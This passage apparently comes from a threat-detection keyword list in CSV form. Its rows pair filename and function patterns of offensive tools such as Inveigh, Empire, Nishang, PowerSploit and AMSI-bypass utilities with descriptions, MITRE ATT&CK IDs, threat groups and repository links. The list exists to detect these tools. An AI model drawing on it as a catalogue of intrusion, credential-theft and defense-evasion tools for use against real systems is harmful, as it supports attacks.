- T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Inveigh Relay*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Inveigh.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*Inveigh.ps1*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh.psd1*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh.psm1*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh.sln*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*inveigh_version*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Inveigh-Cleartext.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-FormInput.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-Log.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-master*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-net*.zip*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-NTLMv1.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-NTLMv2.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*-InveighRelay *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Inveigh-Relay.ps1*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*inveighzero.exe*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*InvisibilityCloak.py*,offensive_tool_keyword,InvisibilityCloak,Proof-of-concept obfuscation toolkit for C# post-exploitation tools,T1027 - T1059.003 - T1140 - T1107,TA0004 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/h4wkst3r/InvisibilityCloak,1,1,N/A,N/A,4,375,147,2022-07-22T14:13:53Z,2021-05-19T14:19:49Z -*Invisi-Shell*,offensive_tool_keyword,Invisi-Shell,Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.,T1059 - T1053 - T1027 - T1055 - T1562,TA0002 - TA0008 - TA0011,N/A,N/A,Defense Evasion,https://github.com/OmerYa/Invisi-Shell,1,0,N/A,N/A,10,921,143,2019-08-19T19:55:19Z,2018-10-14T23:32:56Z -*invoke obfuscation*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*invoke* -Action command -Execute * -Session*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,0,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-*WDigestDowngrade.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*invoke_obfuscation.py*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*invoke_sessiongopher.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*Invoke-AccessCheckForAllGroups*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForAllServicePrincipals*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForAllUsers*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForCurrentUser*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForCurrentUser*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForGroup*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForServicePrincipal*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AccessCheckForUser*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-ACLcsvFileAnalysis*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Invoke-ACLPwn*,offensive_tool_keyword,Invoke-ACLpwn,Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.,T1098 - T1208 - T1484 - T1486 - T1059,TA0005 - TA0007,N/A,N/A,Exploitation tools,https://github.com/fox-it/Invoke-ACLPwn,1,0,N/A,N/A,5,498,86,2022-09-15T15:13:00Z,2018-04-26T09:21:27Z -*Invoke-ACLScanner * -Filter *,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*Invoke-ACLScanner * -Name *,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*invoke-aclscanner*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-ACLScanner*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-ADCSTemplateRecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-ADSBackdoor*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*Invoke-ADSBackdoor*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-AirstrikeAttackCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-AllAccessChecks*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Invoke-AllChecks*,offensive_tool_keyword,AD exploitation cheat sheet,Check for vulnerable programs and configs,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-AmsiBypass*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Invoke-AmsiBypass*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-APIConnectionHijack.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-ApplicationsOnStartupCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-ApplicationsOnStartupCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ARPScan*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-ARPScan.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-arpscan*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-ARPScan.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ASREPRoast*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,1,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z -*InvokeAssembly.x64.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 